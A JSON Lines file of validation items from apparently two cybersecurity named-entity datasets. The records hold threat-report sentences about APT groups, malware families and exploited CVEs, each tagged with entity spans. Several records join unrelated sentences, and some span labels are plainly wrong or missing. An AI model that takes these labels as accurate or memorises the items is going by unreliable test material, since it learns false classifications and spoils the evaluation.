{"text": "This sample was also found to be deployed using the CVE-2012-0158 vulnerability . In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing .", "spans": {"Vulnerability: CVE-2012-0158": [[52, 65]], "Malware: Adobe Gh0st": [[104, 115]], "Malware: Poison Ivy": [[118, 128]], "Malware: Torn RAT malware": [[133, 149]]}, "info": {"id": "cyberner_stix_valid_000976", "source": "cyberner_stix_valid"}}
{"text": "TG-4127 created 150 short links targeting this group .", "spans": {}, "info": {"id": "cyberner_stix_valid_000977", "source": "cyberner_stix_valid"}}
{"text": "] 230 [ . This assertion of time zone is also supported by timestamps found in many GeminiDuke samples , which similarly suggest the group work in the Moscow Standard Time timezone , as further detailed in the section on the technical analysis of GeminiDuke . The base64 encoded PE file that can be seen in line 2760 of the image above is a GandCrab Variant . Charming Kitten members , claiming to be a senior teaching and research fellow at SOAS university in London sent targeted emails to a select number of victims from fewer than 10 organizations in the US and UK , inviting them to an online conference called The US Security Challenges in the Middle East .", "spans": {"Malware: GandCrab": [[341, 349]]}, "info": {"id": "cyberner_stix_valid_000978", "source": "cyberner_stix_valid"}}
{"text": "Most of them are almost harmless — all they did until recently was injecting tons of ads and downloading others of their kind . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors , several financial institutes , and the Israeli Post Office .", "spans": {"Organization: Unit 42": [[128, 135]], "Vulnerability: CVE-2012-0158": [[192, 205]], "Malware: VPN Web Portal": [[275, 289]], "Organization: IT vendors": [[325, 335]], "Organization: financial institutes": [[346, 366]], "Organization: Israeli Post Office": [[377, 396]]}, "info": {"id": "cyberner_stix_valid_000979", "source": "cyberner_stix_valid"}}
{"text": "On September 13 , WADA confirmed that APT28 had compromised its networks and accessed athlete medical data .", "spans": {"Organization: WADA": [[18, 22]]}, "info": {"id": "cyberner_stix_valid_000980", "source": "cyberner_stix_valid"}}
{"text": "+86.01078456689 Fax . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals .", "spans": {"Vulnerability: Flash vulnerability": [[130, 149]], "Vulnerability: CVE-2015-5119": [[152, 165]], "Organization: economic": [[303, 311]]}, "info": {"id": "cyberner_stix_valid_000981", "source": "cyberner_stix_valid"}}
{"text": "In a report released on January 7 2017 , the U.S. Directorate of National Intelligence described this activity as an “ influence campaign. ” This influence campaign - a combination of network compromises and subsequent data leaks - aligns closely with the Russian military ’s publicly stated intentions and capabilities .", "spans": {"Organization: Directorate of National Intelligence": [[50, 86]]}, "info": {"id": "cyberner_stix_valid_000982", "source": "cyberner_stix_valid"}}
{"text": "9b2fd7189395b2f34781b499f5cae10ec86aa7ab373fbdc2a14ec4597d4799ba ac216d502233ca0fe51ac2bb64cfaf553d906dc19b7da4c023fec39b000bc0d7 b1ccb5618925c8f0dda8d13efe4a1e1a93d1ceed9e26ec4a388229a28d1f8d5b ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research .", "spans": {"Organization: development company": [[413, 432]], "Malware: CONFUCIUS_A": [[447, 458]], "Malware: CONFUCIUS_B": [[463, 474]], "Organization: universities": [[561, 573]]}, "info": {"id": "cyberner_stix_valid_000983", "source": "cyberner_stix_valid"}}
{"text": "The app that resulted in the largest number of affected users was the click fraud version , which was installed over 170,000 times at its peak in February 2018 . PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release . Various artifacts from the initial phases of the incident provided strong indications of the existence of this particular threat group within the client's infrastructure . According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": {"System: HTTP headers of the server": [[578, 604]], "Organization: Oracle": [[725, 731]], "Vulnerability: vulnerability": [[770, 783]]}, "info": {"id": "cyberner_stix_valid_000984", "source": "cyberner_stix_valid"}}
{"text": "It minimizes the risk of overexposure by specifically targeting Arabic speakers .", "spans": {}, "info": {"id": "cyberner_stix_valid_000985", "source": "cyberner_stix_valid"}}
{"text": "This submitter has thousands of other submissions in VirusTotal , however , it is the only one that continues to submit EventBot samples via the VirusTotal API . This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Malware: EventBot": [[120, 128]], "Malware: Panda Banker": [[208, 220]], "Organization: financial institutions": [[256, 278]], "Organization: CrowdStrike": [[378, 389]], "Organization: dissidents": [[444, 454]]}, "info": {"id": "cyberner_stix_valid_000986", "source": "cyberner_stix_valid"}}
{"text": "On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack .", "spans": {"System: Windows": [[102, 109]], "Malware: Nidiran": [[190, 197]]}, "info": {"id": "cyberner_stix_valid_000987", "source": "cyberner_stix_valid"}}
{"text": "Initially some particular words from the decompiled classes.dex of Exodus Two sent us in the right direction . Proofpoint is tracking this attacker , believed to operate out of China , as TA459 . The macro code embedded in the document is rather simple and is not obfuscated . Many of the individuals work at organizations related to financial services , cryptocurrency , blockchain , web3 and related entities .", "spans": {"Malware: Exodus": [[67, 73]], "Organization: Proofpoint": [[111, 121]]}, "info": {"id": "cyberner_stix_valid_000988", "source": "cyberner_stix_valid"}}
{"text": "After manual launch , it shows a fake welcome notification to the user : Dear Customer , we ’ re updating your configuration and it will be ready as soon as possible . The January 2017 report followed up on other private reports published on the group’s BeEF-related activity in 2015 and 2016 . The group has been observed utilizing TRITON , a malware framework designed to manipulate industrial safety systems .", "spans": {"Malware: TRITON": [[333, 339]]}, "info": {"id": "cyberner_stix_valid_000989", "source": "cyberner_stix_valid"}}
{"text": "Ginp embeds the following set of features , allowing it to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( local overlays obtained from the C2 ) SMS harvesting : SMS listing SMS harvesting : SMS forwarding Contact list collection Application listing Overlaying : Targets list update SMS : Sending Calls : Call forwarding C2 Resilience : Auxiliary C2 list Self-protection : Hiding the App icon Self-protection : Preventing removal Self-protection : Emulation-detection Update 'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The web server was also a C2 server for another threat , Minzen ( a.k.a , XXMM , Wali , or ShadowWali ) .", "spans": {"Malware: Ginp": [[0, 4]], "Malware: 'Improvise'": [[508, 519]], "Malware: Minzen": [[810, 816]], "Malware: XXMM": [[827, 831]], "Malware: Wali": [[834, 838]], "Malware: ShadowWali": [[844, 854]]}, "info": {"id": "cyberner_stix_valid_000990", "source": "cyberner_stix_valid"}}
{"text": "All the observed landing pages mimic the mobile operators ’ web pages through their domain name and web page content as well . According to Cheetah Mobile’s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . The group has targeted a variety of victims including but not limited to media outlets , high-tech companies , and multiple governments .", "spans": {"Malware: Batmobi": [[233, 240]], "Malware: Duapps": [[243, 249]], "Malware: Cheetah SDK": [[268, 279]], "Organization: media outlets": [[355, 368]], "Organization: high-tech companies": [[371, 390]], "Organization: multiple governments": [[397, 417]]}, "info": {"id": "cyberner_stix_valid_000991", "source": "cyberner_stix_valid"}}
{"text": "The sample we analyzed is most likely forked from open source quasar 1.2.0.0 .", "spans": {"Malware: quasar 1.2.0.0": [[62, 76]]}, "info": {"id": "cyberner_stix_valid_000992", "source": "cyberner_stix_valid"}}
{"text": "Throughout 2017 we observed this threat actor actively attempting to compromise victims with various malware payloads .", "spans": {}, "info": {"id": "cyberner_stix_valid_000993", "source": "cyberner_stix_valid"}}
{"text": "The Cybereason Nocturnus team will continue to monitor EventBot ’ s development . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[55, 63]], "Organization: government officials": [[110, 130]], "Malware: malicious Microsoft Word document": [[172, 205]], "Vulnerability: CVE-2012-0158": [[225, 238]], "Malware: Poison Ivy": [[326, 336]], "Malware: PlugX": [[449, 454]]}, "info": {"id": "cyberner_stix_valid_000994", "source": "cyberner_stix_valid"}}
{"text": "Apart from collecting the above data , the spyware monitors users ’ phone calls , records them , and saves the recorded file on the device . We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester . This downloader , seen in past FIN7 campaigns , downloads a one-byte XOR encrypted ( eg. with the key equal to 0x50 or 0x51 ) piece of meterpreter shellcode to execute . Usually , they ’d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": {"Malware: Bluetooth device harvester": [[230, 256]]}, "info": {"id": "cyberner_stix_valid_000995", "source": "cyberner_stix_valid"}}
{"text": "This is then returned as a string to PowerShell , which calls invoke-expression ( iex ) on it , indicating that the expected payload is PowerShell .", "spans": {}, "info": {"id": "cyberner_stix_valid_000996", "source": "cyberner_stix_valid"}}
{"text": "Mandiant disclosed these vulnerabilities to Lenovo in May of 2016 . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"Organization: Mandiant": [[0, 8]], "Organization: governments": [[178, 189]], "Organization: dissidents": [[214, 224]], "Organization: journalists": [[229, 240]]}, "info": {"id": "cyberner_stix_valid_000997", "source": "cyberner_stix_valid"}}
{"text": "Its configuration utilities like Margarita allows the NOC (Network Operation Center) to customize tools based on requirements from 'Fine Dining' questionairies . In addition , a current ANY.RUN playback of our observed Elise infection is also available .", "spans": {"Malware: Margarita": [[33, 42]], "Indicator: ANY.RUN": [[186, 193]], "Indicator: Elise": [[219, 224]]}, "info": {"id": "cyberner_stix_valid_000998", "source": "cyberner_stix_valid"}}
{"text": "Originally targeting Western European banks , it has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns : PLEAD , Shrouded Crossbow , and of late , Waterbear .", "spans": {"Organization: banks": [[38, 43]]}, "info": {"id": "cyberner_stix_valid_000999", "source": "cyberner_stix_valid"}}
{"text": "Just like the old-school mail worms that used the victim 's address book to select the next victims , this banking trojan 's activation cycle includes the exfiltration of the victim 's address book . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced Payload PNG ( loader #2 ) . TeamTNT has used an IRC bot for C2 communications.[13 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": {"System: address book": [[60, 72]], "Organization: technology": [[351, 361]], "Organization: telecommunications sector": [[366, 391]], "Organization: MSPs": [[505, 509]], "Indicator: d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced": [[525, 589]], "System: C2": [[650, 652]]}, "info": {"id": "cyberner_stix_valid_001000", "source": "cyberner_stix_valid"}}
{"text": "\" PittyTiger \" is a mutex used by the malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": {}, "info": {"id": "cyberner_stix_valid_001001", "source": "cyberner_stix_valid"}}
{"text": "In the case of FinFisher , however , we could not find a good existing interactive disassembler ( IDA ) plugin that can normalize the code flow . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan . The malware files simply have lots of clean files appended to them . To understand the context of a computing interaction between servers , tools , and users , we need to analyze the endtoend process .", "spans": {"Malware: FinFisher": [[15, 24]], "Organization: individual": [[168, 178]], "System: servers": [[466, 473]], "Organization: users": [[488, 493]]}, "info": {"id": "cyberner_stix_valid_001002", "source": "cyberner_stix_valid"}}
{"text": "Machine learning module indicates continuous evolution As mentioned , this ransomware is the latest variant of a malware family that has undergone several stages of evolution . FireEye gained visibility into one of 23 known command-and-control ( CnC ) servers operated by the Ke3chang actor for about one week . however TAU expects not only APT10 but also other threat actors will start to use them . The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": {"Organization: FireEye": [[177, 184]], "Organization: TAU": [[320, 323]], "Organization: institutions in the legal and governmental fields .": [[478, 529]]}, "info": {"id": "cyberner_stix_valid_001003", "source": "cyberner_stix_valid"}}
{"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare .", "spans": {}, "info": {"id": "dnrti_valid_000000", "source": "dnrti_valid"}}
{"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics .", "spans": {}, "info": {"id": "dnrti_valid_000001", "source": "dnrti_valid"}}
{"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products .", "spans": {"Organization: healthcare firms": [[189, 205]], "Organization: IT organizations": [[208, 224]], "Organization: medical clinics": [[258, 273]], "Organization: logistical organizations": [[280, 304]]}, "info": {"id": "dnrti_valid_000002", "source": "dnrti_valid"}}
{"text": "Once Orangeworm has infiltrated a victim 's network , they deploy Trojan.Kwampirs , a backdoor Trojan that provides the attackers with remote access to the compromised computer .", "spans": {}, "info": {"id": "dnrti_valid_000003", "source": "dnrti_valid"}}
{"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea .", "spans": {"Organization: personnel": [[56, 65]]}, "info": {"id": "dnrti_valid_000004", "source": "dnrti_valid"}}
{"text": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim 's network by copying itself over network shares .", "spans": {}, "info": {"id": "dnrti_valid_000005", "source": "dnrti_valid"}}
{"text": "In mid-August , the OilRig threat group sent what appeared to be a highly targeted phishing email to a high-ranking office in a Middle Eastern nation .", "spans": {}, "info": {"id": "dnrti_valid_000006", "source": "dnrti_valid"}}
{"text": "Patchwork 's attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 .", "spans": {"Organization: government organization": [[71, 94]]}, "info": {"id": "dnrti_valid_000007", "source": "dnrti_valid"}}
{"text": "The attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 .", "spans": {"Organization: government organization": [[62, 85]]}, "info": {"id": "dnrti_valid_000008", "source": "dnrti_valid"}}
{"text": "The Patchwork attack group has been targeting more than just government-associated organizations .", "spans": {"Organization: government-associated organizations": [[61, 96]]}, "info": {"id": "dnrti_valid_000009", "source": "dnrti_valid"}}
{"text": "Symantec has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks .", "spans": {"Organization: Symantec": [[0, 8]]}, "info": {"id": "dnrti_valid_000010", "source": "dnrti_valid"}}
{"text": "Two security companies , Cymmetria and Kaspersky , each recently released reports on the campaign , most of which are in line with our observations .", "spans": {"Organization: Kaspersky": [[39, 48]]}, "info": {"id": "dnrti_valid_000011", "source": "dnrti_valid"}}
{"text": "Symantec Security Response has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks .", "spans": {"Organization: Symantec Security Response": [[0, 26]]}, "info": {"id": "dnrti_valid_000012", "source": "dnrti_valid"}}
{"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec , we have seen infections in multiple countries due to the nature of the victims operating large international corporations .", "spans": {"Organization: Symantec": [[88, 96]]}, "info": {"id": "dnrti_valid_000013", "source": "dnrti_valid"}}
{"text": "Although approximately half of the attacks focus on the US , other targeted regions include China , Japan , Southeast Asia , and the United Kingdom .", "spans": {}, "info": {"id": "dnrti_valid_000014", "source": "dnrti_valid"}}
{"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec telemetry , we have seen infections in multiple countries due to the nature of the victims operating large international corporations .", "spans": {"Organization: Symantec": [[88, 96]]}, "info": {"id": "dnrti_valid_000015", "source": "dnrti_valid"}}
{"text": "Our first observation of an attempted attack related to this campaign dates back to November 2015 , although Symantec telemetry data indicates that the campaign may have already existed in early 2015 or perhaps even earlier .", "spans": {"Organization: Symantec": [[109, 117]]}, "info": {"id": "dnrti_valid_000016", "source": "dnrti_valid"}}
{"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system .", "spans": {}, "info": {"id": "dnrti_valid_000017", "source": "dnrti_valid"}}
{"text": "While both back door Trojans wait for commands from the threat actor , they can search for files and upload them to the specified server once activated .", "spans": {}, "info": {"id": "dnrti_valid_000018", "source": "dnrti_valid"}}
{"text": "Patchwork ( also known as Dropping Elephant ) is a cyberespionage group whose targets included diplomatic and government agencies as well as businesses .", "spans": {"Organization: diplomatic": [[95, 105]], "Organization: government agencies": [[110, 129]]}, "info": {"id": "dnrti_valid_000019", "source": "dnrti_valid"}}
{"text": "Patchwork is known for rehashing off-therack tools and malware for its own campaigns .", "spans": {}, "info": {"id": "dnrti_valid_000020", "source": "dnrti_valid"}}
{"text": "They also included Dynamic Data Exchange ( DDE ) and Windows Script Component ( SCT ) abuse to their tactics , as well as started exploiting recently reported vulnerabilities .", "spans": {}, "info": {"id": "dnrti_valid_000021", "source": "dnrti_valid"}}
{"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros .", "spans": {}, "info": {"id": "dnrti_valid_000022", "source": "dnrti_valid"}}
{"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document .", "spans": {}, "info": {"id": "dnrti_valid_000023", "source": "dnrti_valid"}}
{"text": "It 's probable that Patchwork uses this package to facilitate server installation when using a Windows environment .", "spans": {}, "info": {"id": "dnrti_valid_000024", "source": "dnrti_valid"}}
{"text": "In March and April 2018 , Volexity identified multiple spear phishing campaigns attributed to Patchwork , an Indian APT group also known as Dropping Elephant .", "spans": {"Organization: Volexity": [[26, 34]]}, "info": {"id": "dnrti_valid_000025", "source": "dnrti_valid"}}
{"text": "This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia .", "spans": {"Organization: 360 Threat Intelligence Center": [[120, 150]], "Organization: Trend Micro": [[198, 209]]}, "info": {"id": "dnrti_valid_000026", "source": "dnrti_valid"}}
{"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages .", "spans": {"Organization: Volexity": [[0, 8]]}, "info": {"id": "dnrti_valid_000027", "source": "dnrti_valid"}}
{"text": "The newsletter includes a link to the attacker 's website , which has content focusing on topics related to China to draw the target 's interest .", "spans": {}, "info": {"id": "dnrti_valid_000028", "source": "dnrti_valid"}}
{"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : https://github.com/rxwx/CVE-2017-8570 .", "spans": {}, "info": {"id": "dnrti_valid_000030", "source": "dnrti_valid"}}
{"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools .", "spans": {}, "info": {"id": "dnrti_valid_000031", "source": "dnrti_valid"}}
{"text": "From the attacks observed by Volexity , what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks .", "spans": {"Organization: Volexity": [[29, 37]]}, "info": {"id": "dnrti_valid_000036", "source": "dnrti_valid"}}
{"text": "Once started , it downloads additional malware from the C2 and also uploads some basic system information , stealing , among other things , the user 's Google Chrome credentials .", "spans": {}, "info": {"id": "dnrti_valid_000037", "source": "dnrti_valid"}}
{"text": "It repeatedly attempts to iterate through directories and to collect files with the following extensions : doc , docx , ppt , pptx , pps , ppsx , xls , xlsx , and pdf .", "spans": {}, "info": {"id": "dnrti_valid_000038", "source": "dnrti_valid"}}
{"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 .", "spans": {}, "info": {"id": "dnrti_valid_000039", "source": "dnrti_valid"}}
{"text": "In the past few months , Unit 42 has observed the Patchwork group , alternatively known as Dropping Elephant and Monsoon , conducting campaigns against targets located in the Indian subcontinent .", "spans": {"Organization: Unit 42": [[25, 32]]}, "info": {"id": "dnrti_valid_000040", "source": "dnrti_valid"}}
{"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability .", "spans": {"Vulnerability: CVE-2017-0261": [[49, 62]], "Vulnerability: CVE-2015-2545": [[196, 209]]}, "info": {"id": "dnrti_valid_000043", "source": "dnrti_valid"}}
{"text": "The Patchwork group continues to plague victims located within the Indian subcontinent .", "spans": {}, "info": {"id": "dnrti_valid_000044", "source": "dnrti_valid"}}
{"text": "The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia .", "spans": {"Organization: government agencies": [[98, 117]]}, "info": {"id": "dnrti_valid_000045", "source": "dnrti_valid"}}
{"text": "It appears to have started in December 2015 and is still ongoing as of July 2016 .", "spans": {}, "info": {"id": "dnrti_valid_000046", "source": "dnrti_valid"}}
{"text": "The use of weaponized legitimate documents is a longstanding operational standard of Patchwork .", "spans": {}, "info": {"id": "dnrti_valid_000047", "source": "dnrti_valid"}}
{"text": "It is dropped by at least one of the weaponised documents17 used in the MONSOON campaign where it is embedded inside another executable .", "spans": {}, "info": {"id": "dnrti_valid_000048", "source": "dnrti_valid"}}
{"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents .", "spans": {}, "info": {"id": "dnrti_valid_000049", "source": "dnrti_valid"}}
{"text": "The targeting of Chinese nationals may also be related to this campaign , but equally may be part of a separate campaign by the adversary or even as part of them selling Surveillance-As-A-Service in a similar manner previously seen with the HANGOVER group .", "spans": {}, "info": {"id": "dnrti_valid_000050", "source": "dnrti_valid"}}
{"text": "The use of weaponized legitimate documents is a longstanding operational standard of this group .", "spans": {}, "info": {"id": "dnrti_valid_000051", "source": "dnrti_valid"}}
{"text": "We decided to spend some time to investigate around this malware and found out that it was used exclusively by a single group of attackers .", "spans": {}, "info": {"id": "dnrti_valid_000052", "source": "dnrti_valid"}}
{"text": "The newsnstat.com domain was used earlier in 2015 for previous HANGOVER campaigns , and was then repurposed in December 2015 for the MONSOON campaign .", "spans": {}, "info": {"id": "dnrti_valid_000053", "source": "dnrti_valid"}}
{"text": "Our researches around the malware family revealed the \" Pitty Tiger \" group has been active since 2011 , yet we found traces which makes us believe the group is active since 2010 .", "spans": {}, "info": {"id": "dnrti_valid_000054", "source": "dnrti_valid"}}
{"text": "The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware .", "spans": {}, "info": {"id": "dnrti_valid_000055", "source": "dnrti_valid"}}
{"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons .", "spans": {}, "info": {"id": "dnrti_valid_000056", "source": "dnrti_valid"}}
{"text": "PittyTiger could also use CVE-2014-1761 , which is more recent .", "spans": {"Vulnerability: CVE-2014-1761": [[26, 39]]}, "info": {"id": "dnrti_valid_000060", "source": "dnrti_valid"}}
{"text": "\" PittyTiger \" is a mutex used by the malware .", "spans": {}, "info": {"id": "dnrti_valid_000061", "source": "dnrti_valid"}}
{"text": "This RAT is the origin of the attackers ' group name .", "spans": {}, "info": {"id": "dnrti_valid_000062", "source": "dnrti_valid"}}
{"text": "Paladin RAT is another remote administration tool used by the Pitty Tiger group .", "spans": {}, "info": {"id": "dnrti_valid_000063", "source": "dnrti_valid"}}
{"text": "Pitty Tiger , like other APT attackers , often use anti-virus \" familiar names \" when registering domains or creating subdomains .", "spans": {}, "info": {"id": "dnrti_valid_000064", "source": "dnrti_valid"}}
{"text": "\" Pitty Tiger \" is also a string transmitted in the network communications of the RAT .", "spans": {}, "info": {"id": "dnrti_valid_000065", "source": "dnrti_valid"}}
{"text": "A recent report documents a group of attackers known as \" PittyTiger \" that appears to have been active since at least 2011 ; however , they may have been operating as far back as 2008 .", "spans": {}, "info": {"id": "dnrti_valid_000066", "source": "dnrti_valid"}}
{"text": "We have been monitoring the activities of this group and believe they are operating from China .", "spans": {}, "info": {"id": "dnrti_valid_000067", "source": "dnrti_valid"}}
{"text": "By integrating the findings with prior research , it was possible to connect MONSOON directly with infrastructure used by the HANGOVER group via a series of strong connections .", "spans": {}, "info": {"id": "dnrti_valid_000069", "source": "dnrti_valid"}}
{"text": "Backdoor.APT.PittyTiger – This malware is the classic \" PittyTiger \" malware ( PittyTigerV1.0 ) that was heavily used by this group in 2012 - 2013 .", "spans": {}, "info": {"id": "dnrti_valid_000070", "source": "dnrti_valid"}}
{"text": "It also appears the attackers use this as second-stage malware .", "spans": {}, "info": {"id": "dnrti_valid_000072", "source": "dnrti_valid"}}
{"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment .", "spans": {}, "info": {"id": "dnrti_valid_000074", "source": "dnrti_valid"}}
{"text": "PittyTiger leverages social engineering to deliver spearphishing emails , in a variety of languages including English , French and Chinese , and email phishing pages to their targets .", "spans": {}, "info": {"id": "dnrti_valid_000075", "source": "dnrti_valid"}}
{"text": "PLATINUM has been targeting its victims since at least as early as 2009 , and may have been active for several years prior .", "spans": {}, "info": {"id": "dnrti_valid_000076", "source": "dnrti_valid"}}
{"text": "This section describes the history , behavior , and tactics of a newly discovered targeted activity group , which Microsoft has code-named PLATINUM .", "spans": {"Organization: Microsoft": [[114, 123]]}, "info": {"id": "dnrti_valid_000077", "source": "dnrti_valid"}}
{"text": "Like many such groups , PLATINUM seeks to steal sensitive intellectual property related to government interests , but its range of preferred targets is consistently limited to specific governmental organizations , defense institutes , intelligence agencies , diplomatic institutions , and telecommunication providers in South and Southeast Asia .", "spans": {"Organization: governmental organizations": [[185, 211]], "Organization: defense institutes": [[214, 232]], "Organization: intelligence agencies": [[235, 256]], "Organization: diplomatic institutions": [[259, 282]], "Organization: telecommunication providers": [[289, 316]]}, "info": {"id": "dnrti_valid_000078", "source": "dnrti_valid"}}
{"text": "LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once .", "spans": {}, "info": {"id": "dnrti_valid_000081", "source": "dnrti_valid"}}
{"text": "PLATINUM often spear phishes its targets at their non-official or private email accounts , to use as a stepping stone into the intended organization 's network .", "spans": {}, "info": {"id": "dnrti_valid_000082", "source": "dnrti_valid"}}
{"text": "PLATINUM uses custom-developed malicious tools and has the resources to update these applications often to avoid being detected .", "spans": {}, "info": {"id": "dnrti_valid_000083", "source": "dnrti_valid"}}
{"text": "PLATINUM primarily targets its intended victims using spear phishing .", "spans": {}, "info": {"id": "dnrti_valid_000084", "source": "dnrti_valid"}}
{"text": "PLATINUM configures its backdoor malware to restrict its activities to victims ' working hours , in an attempt to disguise post-infection network activity within normal user traffic .", "spans": {}, "info": {"id": "dnrti_valid_000085", "source": "dnrti_valid"}}
{"text": "PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages .", "spans": {}, "info": {"id": "dnrti_valid_000086", "source": "dnrti_valid"}}
{"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts .", "spans": {"Vulnerability: zero-day exploits": [[43, 60]]}, "info": {"id": "dnrti_valid_000087", "source": "dnrti_valid"}}
{"text": "For the initial infection , PLATINUM typically sends malicious documents that contain exploits for vulnerabilities in various software programs , with links or remotely loaded components ( images or scripts or templates ) that are delivered to targets only once .", "spans": {}, "info": {"id": "dnrti_valid_000088", "source": "dnrti_valid"}}
{"text": "PLATINUM 's approach toward exploiting vulnerabilities varies between campaigns .", "spans": {}, "info": {"id": "dnrti_valid_000089", "source": "dnrti_valid"}}
{"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer .", "spans": {"Vulnerability: CVE-2015-2545": [[153, 166]]}, "info": {"id": "dnrti_valid_000091", "source": "dnrti_valid"}}
{"text": "n one case from 2013 , the target was sent a malicious document through a spear phishing email message .", "spans": {"Malware: malicious document": [[45, 63]]}, "info": {"id": "dnrti_valid_000092", "source": "dnrti_valid"}}
{"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application .", "spans": {"Vulnerability: CVE-2015-2546": [[72, 85]]}, "info": {"id": "dnrti_valid_000093", "source": "dnrti_valid"}}
